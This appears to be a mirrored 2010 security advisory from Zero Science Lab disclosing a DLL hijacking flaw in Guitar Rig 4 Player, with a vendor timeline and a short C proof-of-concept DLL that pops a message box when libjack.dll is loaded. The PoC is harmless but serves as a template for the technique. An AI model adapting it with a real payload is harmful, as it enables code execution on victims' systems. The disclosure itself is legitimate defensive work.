Lucene search

K
zeroscienceGjoko KrsticZSL-2010-4973
HistoryNov 20, 2010 - 12:00 a.m.

Native Instruments Guitar Rig 4 Player v4.1.1 Insecure Library Loading Vulnerability

2010-11-2000:00:00
Gjoko Krstic
zeroscience.mk
38

AI Score

8

Confidence

Low

Title: Native Instruments Guitar Rig 4 Player v4.1.1 Insecure Library Loading Vulnerability
Advisory ID: ZSL-2010-4973
Type: Local/Remote
Impact: System Access
Risk: (5/5)
Release Date: 20.11.2010

Summary

GUITAR RIG 4 PLAYER is the free, modular and expandable effects processor from Native Instruments, combining creative effects routing possibilities with ease-of-use and pristine sound quality. The included FACTORY SELECTION library provides one stunning Amp emulation with Matched Cabinet, plus 20 effects and sound modifiers to shape and enhance any audio signal.

Description

Guitar Rig 4 Player suffers from a DLL hijacking vulnerability, which could be exploited by remote attackers to compromise a vulnerable system. This issue is caused due to the application insecurely loading certain libraries (β€œlibjack.dll”) from the current working directory, which could allow attackers to execute arbitrary code by tricking a user into opening specific related files (.nkm and .nkp) from a network share.

Vendor

Native Instruments GmbH - http://www.native-instruments.com

Affected Version

4.1.1.1845 (Standalone)

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

[06.11.2010] Vulnerability discovered.
[09.11.2010] Contact with the vendor.
[09.11.2010] Vendor replies.
[09.11.2010] Explained to the vendor that we want to report a vulnerability.
[09.11.2010] Vendor answers in confusion.
[09.11.2010] Explained in details what this is all about.
[10.11.2010] Vendor informs the corresponding department and stated that if they’re interested, they’ll contact us.
[18.11.2010] Nobody gets in touch with us.
[19.11.2010] Informed the vendor that the public disclosure will occur on 20th of November.
[20.11.2010] Public advisory released.

PoC

guitar4_dll.c

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
[2] http://packetstormsecurity.org/files/95999
[3] http://www.securityfocus.com/bid/44989
[4] http://xforce.iss.net/xforce/xfdb/61321

Changelog

[20.11.2010] - Initial release
[22.11.2010] - Added reference [1], [2] and [3]
[24.11.2010] - Added reference [4]

Contact

Zero Science Lab

Web: http://www.zeroscience.mk
e-mail: [email protected]

<html><body><p>/*

 Native Instruments Guitar Rig 4 Player v4.1.1 Insecure Library Loading Vulnerability


 Vendor: Native Instruments GmbH
 Product web page: http://www.native-instruments.com
 Affected version: 4.1.1.1845 (Standalone)

 Summary: GUITAR RIG 4 PLAYER is the free, modular and expandable effects processor
 from Native Instruments, combining creative effects routing possibilities with
 ease-of-use and pristine sound quality. The included FACTORY SELECTION library
 provides one stunning Amp emulation with Matched Cabinet, plus 20 effects and sound
 modifiers to shape and enhance any audio signal.

 Desc: Guitar Rig 4 Player suffers from a DLL hijacking vulnerability, which could be
 exploited by remote attackers to compromise a vulnerable system. This issue is
 caused due to the application insecurely loading certain libraries ("libjack.dll")
 from the current working directory, which could allow attackers to execute arbitrary
 code by tricking a user into opening specific related files (.nkm and .nkp) from a
 network share.

 Tested on: Microsoft Windows XP Professional SP3 (English)

 Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk

 Advisory ID: ZSL-2010-4973
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4973.php

 06.11.2010

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
</windows.h></p></body></html>

AI Score

8

Confidence

Low